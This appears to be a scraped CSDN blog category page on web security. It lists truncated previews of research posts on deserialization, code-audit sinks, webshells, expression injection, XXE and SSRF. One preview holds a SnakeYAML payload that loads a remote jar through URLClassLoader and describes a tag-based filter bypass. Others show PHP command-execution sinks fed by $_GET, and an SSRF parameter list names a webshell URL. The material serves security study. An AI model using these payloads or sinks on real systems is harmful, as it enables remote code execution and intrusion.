![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全
u013224189
这个作者很懒,什么都没留下…
展开
-
yaml反序列化
Yaml反序列化payloads1:!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:7800/yaml-payload.jar"] ]]]payloads2: 绕过 !! 的限制,如下: !可以用 tag:yaml.org,2002 表示。!<tag:yaml.org,2002:javax.script.Scri原创 2020-11-23 00:05:02 · 2175 阅读 · 1 评论 -
PHP代码审计
PHP代码审计RCE反引号中包括变量<?php$varch = $_GET['hi'];$output = `$varch`;echo "<pre>$output</pre>";?>array_map()中包含变量作用是为数组的每个元素应用回调函数 。其返回值为数组,是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。<?php$arra原创 2020-11-23 00:02:06 · 540 阅读 · 0 评论 -
java-web安全——RandomAccessFile 和 FileSystemProvider文件读写
package com.his;import java.io.ByteArrayOutputStream;import java.io.File;import java.io.IOException;import java.io.RandomAccessFile;import java.nio.file.Files;import java.nio.file.Path;import ...原创 2020-04-25 22:02:03 · 464 阅读 · 0 评论 -
liferay CVE-2020-7961 漏洞回显
liferay CVE-2020-7961 漏洞回显import com.liferay.portal.kernel.security.access.control.AccessControlUtil;import com.liferay.portal.kernel.security.auth.AccessControlContext;import javax.servlet.http.H...原创 2020-04-22 17:32:04 · 1717 阅读 · 0 评论 -
idea搜索 matches limit
idea搜索 matches limit 默认显示100,可通过如下限制,增加搜索返回内容help ——> find Action ——> 输入 Registry ——> 找到 ide.usages.page.size ,修改原创 2020-04-21 08:49:19 · 422 阅读 · 0 评论 -
EBS远程调试
EBS远程调试/u01/install/APPS/inst/apps/EBSDB_ebs/ora/10.1.3/opmn/conf/opmn.xml原创 2020-04-21 08:29:50 · 165 阅读 · 0 评论 -
404 WebshellDemo
404 webshell Demopackage controller;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import javax.servlet.http.HttpServletRequest;i...原创 2020-09-28 11:30:14 · 253 阅读 · 0 评论 -
Fel表达式注入
Fel表达式注入命令执行Demopackage com.his;import com.greenpineyu.fel.Expression;import com.greenpineyu.fel.FelEngine;import com.greenpineyu.fel.FelEngineImpl;import com.greenpineyu.fel.context.FelContext;...原创 2020-03-31 22:05:42 · 1395 阅读 · 0 评论 -
XML文件的解析以及XML外部实体注入防护
XML外部实体注入 (XXE防护)原创 2015-11-10 18:41:16 · 36853 阅读 · 14 评论 -
Web安全之语法知识补习
Web安全,不可信数据源及缺陷可能发生的位置原创 2015-11-03 18:45:50 · 819 阅读 · 0 评论 -
摘抄——OWASP_Code_Review_Guide-V1_1 (1)
web安全之不信任的数据来源转载 2015-11-13 09:28:38 · 796 阅读 · 0 评论 -
web应用想要达到完全的线程安全,需要注意哪些地方?
web应用想要达到完全的线程安全,需要注意哪些地方?关注web安全知识,正好搜到一个前辈在帖子下的答复,现记录下来,希望可以在日后用到:转载 2015-11-01 21:53:44 · 1331 阅读 · 0 评论 -
[转]Web安全之JSP详解
web安全知识之JSP语法详解转载 2015-11-02 18:05:49 · 801 阅读 · 0 评论 -
小白上路_spring-security-oauth2 RCE复现分析
小白上路_spring-security-oauth2 RCE复现分析首先高兴的宣布,CVE-2018-1260这个漏洞复现成功,弹出了windows可爱的计算器然后就狠狠的抽自己一巴掌,讲述一下自己怎么把它折腾出来的。关于CVE-2018-1260一个标准的由于spring将不可信数据当作SPEL表达式直接解析导致的RCE漏洞影响范围Spring Securit...原创 2018-06-29 14:15:25 · 1046 阅读 · 0 评论 -
微信支付SDK XXE漏洞 验证复现
今天公司收到漏洞预警,微信支付SDK存在XXE漏洞,下载到本地验证了一下漏洞信息来源http://seclists.org/fulldisclosure/2018/Jul/3https://xz.aliyun.com/t/2426漏洞描述微信支持提供了一个接口,供商家接收异步支付结果,微信支付所用的java sdk在处理结果时可能触发一个XXE漏洞,攻击者可以向这...原创 2018-07-03 18:08:08 · 12150 阅读 · 2 评论 -
OGNL表达式注入漏洞要成为过去了吗?
起因Struts2今年来爆出一系列安全漏洞,以至于在官方release页面,还专门罗列了各个版本对应的CVE漏洞,也算是一大奇观。![struts_release](https://img-blog.csdn.net/20180716180339458?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3UwMTMyMjQxODk=/font/5a6...原创 2018-07-18 08:55:08 · 8488 阅读 · 0 评论 -
Fiddler抓包Android 模拟器应用
第一次测试安卓应用,环境不允许使用真机,于是在电脑上安装了个安卓模拟器测试安卓应用,在抓包的时候遇到了点儿问题,网上的资料都是配置模拟器里面的wifi,但效果不理想,总是失败,后面找到了一个别的方式,可以抓浏览器以及应用的流量,所以记录一下。官网下载android Studio, 安装AVD(Android Virtual Device Manager)花了一点时间,主要是网速慢,下载时间长。...原创 2018-08-24 16:46:58 · 1972 阅读 · 0 评论 -
收集子域名
https://github.com/michenriksen/aquatone原创 2018-10-28 23:26:15 · 234 阅读 · 0 评论 -
URL中与SSRF相关的字段
URL中与SSRF相关的字段 relativePath url site path message=[img]http://myserver/wshell.php?logo.jpg[/img] query src src_url sr id vtTopicId //ebs operator(weblogic:SearchPublicRegistries) inputFi...原创 2019-01-12 00:03:50 · 410 阅读 · 0 评论 -
SSRF for DNSLOG
SSRF for DNSLOG#encoding=gbkimport urllib2import threadingimport Queueimport jsonimport sysimport osimport relock = threading.Lock()header = {"Content-type": "application/x-www-form-urlencod...原创 2019-01-13 00:14:30 · 1159 阅读 · 0 评论 -
Web安全之C#语法学习
ASP.NET Web安全知识原创 2015-11-02 16:30:24 · 1577 阅读 · 0 评论